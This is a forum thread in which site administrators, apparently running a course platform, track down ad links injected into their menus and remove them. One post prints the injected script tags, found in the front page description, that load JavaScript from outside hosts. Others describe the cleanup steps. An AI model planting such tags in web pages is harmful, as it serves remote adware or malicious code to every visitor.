I don't know if this is new or not. Some key words in the menu are linked to malicious sites. "Courses" is one of them. how do I get rid of these?
It's "powered by text enhanced".
Hi Dan,
Maybe this can help : http://wafflesatnoon.com/2011/10/05/seeing-unwanted-text-enhance-ads/
Google came up with a lot more when I typed in "powered by text enhanced". Not sure what's relevant to you.
Cheers,
Glenys
I had the same issue. Log in as admin and turn on editing. There is an "empty" box that appears at the top of the right hand column. I removed that and the ads are gone. Trying to find where it came from now. Will post when I find it.
Well, should have looked into it more before I deleted it. I just wanted the thing gone. Thinking it was an HTML block. Saw JavaScript code from other sites. This was one of them:
http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862
This was another:
http://loading-resource.com/data.geo.php?callback=window.__geo.getData
I just moved that particular site to a new host so gonna go through and check file permissions and such. Thinking this was a "hacker" attack.
Please let me know if anyone else is experiencing this.
Thanks!
Jenny
Just found it in the FrontPage settings front page description block. This is the code:
<p></p>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
Still not sure how it got there in the first place, but plan to keep an eye on the site.
I am going to post how I was able to track this down for anyone that had this problem.
I opened the Front Page and went to View Source. Then I searched for loading-resource.
For me the script appeared between two of my course listings. I went to the course directly above the script and found that the course was infected as well. In the course, I also viewed source and found and deleted all three instances of the script.
I also then changed the password of the offending teacher(!!) and notified her.
I will keep an eye on it but hope this maybe helps someone else.
HI,
I am having this same problem and I foud that some browser extensions added this script in text editors , find and delete this extension.